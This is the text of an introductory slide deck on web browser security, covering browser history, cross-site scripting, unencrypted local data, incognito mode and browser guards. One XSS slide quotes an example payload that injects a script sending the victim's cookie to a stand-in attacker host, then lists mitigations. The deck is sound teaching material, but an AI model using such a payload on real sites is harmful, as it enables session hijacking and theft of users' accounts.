110 likes | 134 Views
Web Browser Security. By Robert Sellers Brian Bauer. Relevance Use Internet daily Transmit personal information, needs to be secure Content History Security Issues and Mitigation Protection. Introduction. First ever browser – WorldWideWeb (1990) Created at CERN by Tim Berners-Lee
E N D
Web Browser Security By Robert Sellers Brian Bauer
Relevance • Use Internet daily • Transmit personal information, needs to be secure • Content • History • Security Issues and Mitigation • Protection Introduction
First ever browser – WorldWideWeb (1990) • Created at CERN by Tim Berners-Lee • Used internally, no real security threats • Would only display HTML text • Allowed downloading of other file types History
Mosaic (1993) • First browser with a GUI • Lead to increase in Internet popularity • Netscape Navigator (1994) • Nearly disappeared by 2000 • Internet Explorer (1995) • Held as much as 95% of the market History
Safari (2003) • Apple’s browser • Firefox (2004) • Open source • Chrome (2008) • Rapid increase in market share History
Increase in security issues • Complexity of web sites and browsers • Size of the Internet • Anyone can access • Uses of Internet • Online banking • Shopping • More sharing of sensitive data Security Issues
Cross Site Scripting (XSS) • Takes advantage of complex, dynamic web pages • Injects client side scripts, HTML • Can lead to cookie theft, browser redirection, untrusted content • Nearly 80% of vulnerabilities in 2007 (Symantec) Security Issues
Example http://portal.example/index.php?sessionid=12312312& username=<script>document.location='http://attackerhost.example/cgi-bin/ • cookiesteal.cgi?'+document.cookie</script> • source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting • XSS Mitigation • Disable scripting • Sanitize input, escape HTML/scripts • No script access to cookies Security Issues
Local Storage • Form data • Login credentials • Encryption - HTTP vs HTTPS • Packet sniffing -> session hijacking, password stealing Security Issues
Incognito Mode (Google Chrome) • Allows user to switch between multiple privacy settings with the click of a button • Can be activated in one window/tab but not others • Browser Guards • Modern browsers will prevent users from visiting malicious sites • Two main methods • List of reported malicious sites • Algorithm to detect malicious code on a site • This can protect from viruses, phishing, and other threats Protecting Yourself Online
Browsers can only do so much • Much security is responsibility of web designers • Internet users should be aware of issues Conclusion